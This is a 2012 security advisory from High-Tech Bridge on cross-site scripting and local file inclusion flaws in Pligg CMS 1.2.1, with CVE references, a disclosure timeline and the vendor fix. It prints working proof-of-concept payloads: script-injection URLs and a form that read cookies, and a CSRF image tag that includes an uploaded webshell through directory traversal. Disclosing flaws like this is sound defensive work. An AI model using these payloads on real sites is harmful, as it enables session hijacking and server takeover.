Total Tests:

Multiple vulnerabilities in Pligg CMS

Advisory ID:HTB23089
Product:Pligg CMS
Vendor:Pligg, LLC.
Vulnerable Versions:1.2.1 and probably prior
Tested Version:1.2.1
Advisory Publication:April 25, 2012 [without technical details]
Vendor Notification:April 25, 2012
Vendor Fix:May 18, 2012
Public Disclosure:May 23, 2012
Latest Update:May 21, 2012
Vulnerability Type:Cross-Site Scripting [CWE-79]
PHP File Inclusion [CWE-98]
CVE References:CVE-2012-2435
CVE-2012-2436
Risk Level:High
CVSSv2 Base Scores:2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)
Solution Status:Fixed by Vendor
Discovered and Provided:High-Tech Bridge Security Research Lab
 

Advisory Details:

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Pligg CMS , which can be exploited to perform Cross-Site Scripting (XSS) and Local File Inclusion attacks.

1) Multiple Cross-Site Scripting (XSS) in Pligg CMS: CVE-2012-2436
1.1 Input passed via the arbitrary (any) GET parameter to /admin/admin_index.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in administrator's browser session in context of affected website.
The following PoC (Proof of Concept) demonstrates the vulnerability:
http://[host]/admin/admin_index.php?action=move&any_get_parameter_name_here= %3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/admin/admin_index.php?action=minimize&any_get_parameter_name_h ere=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
1.2 Input passed via the "karma_username" POST parameter to module.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in administrator's browser session in context of affected website.
The following PoC (Proof of Concept) demonstrates the vulnerability:
<form action="http://[host]/module.php?module=karma" method="post" name="main" id="main">
<input type="hidden" name="karma_value" value="1">
<input type="hidden" name="karma_username" value="<script>alert(document.cookie);</script>">
<input type="submit" name="submit" id="btn" value="submit">
</form>

1.3 Input passed via the "q_1_low". "q_1_high", "q_2_low", "q_2_high" GET parameters to module.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in administrator's browser session in context of affected website.
The following PoC (Proof of Concept) demonstrates the vulnerability:
http://[host]/module.php?module=captcha&action=configure&captcha=math&q_1_lo w=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/module.php?module=captcha&action=configure&captcha=math&q_1_hi gh=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/module.php?module=captcha&action=configure&captcha=math&q_2_lo w=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/module.php?module=captcha&action=configure&captcha=math&q_2_hi gh=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
1.4 Input passed via the "edit" GET parameter to module.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in administrator's browser session in context of affected website.
The following PoC (Proof of Concept) demonstrates the vulnerability:
http://[host]/module.php?module=admin_language&mode=edit&edit=%3Cscript%3Eal ert%28document.cookie%29;%3C/script%3E

2) Local File Inclusion in Pligg CMS: CVE-2012-2435
2.1 Input passed via the "captcha" GET parameter to module.php is not properly verified before being used in include_once() function and can be exploited to include arbitrary or previously uploaded local files. This can be exploited to include local files via directory traversal sequences and URL-encoded NULL byte, however successful exploitation of this vulnerability requires administrative privileges. Therefore the most appropriate vector of exploitation is CSRF.
The attacker should register in the system, upload a ".jpg" avatar with malicious content (e.g. PHP webshell upload) and make logged-in administrator visit a specially crafted web page that exploits Local File Inclusion via CSRF. For example this PoC (Proof of Concept):
<img src="http://[host]/module.php?module=captcha&action=configure&captcha=../../ ../avatars/user_uploaded/[USER_ID]_original.jpg%00">
Successful exploitation of this vulnerability requires that "magic_quotes_gpc" is off.

How to Detect Cross-Site Scripting Vulnerabilities
Website Security Test
  • GDPR & PCI DSS Test
  • Website CMS Security Test
  • CSP & HTTP Headers Check
  • WordPress & Drupal Scanning
Try For Free

Solution:
Upgrade to Pligg CMS 1.2.2

More Information: http://forums.pligg.com/downloads.php?do=file&id=15


References:
[1] High-Tech Bridge Advisory HTB23089 - https://www.immuniweb.com/advisory/HTB23089 - Multiple vulnerabilities in Pligg CMS.
[2] Pligg CMS - http://pligg.com - Pligg is an open source CMS (Content Management System) that you can download and use for free.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.

Have additional information to submit?
Please feel free to send us any additional information related to this Advisory, such as vulnerable versions, additional exploitation details and conditions, patches and other relevant details.
Book a Call Ask a Question
Close
Talk to ImmuniWeb Experts
ImmuniWeb AI Platform
Have a technical question?

Our security experts will answer within
one business day. No obligations.

Have a sales question?
Email:
Tel: +41 22 560 6800 (Switzerland)
Tel: +1 720 605 9147 (USA)
*
*
*
Your data will stay private and confidential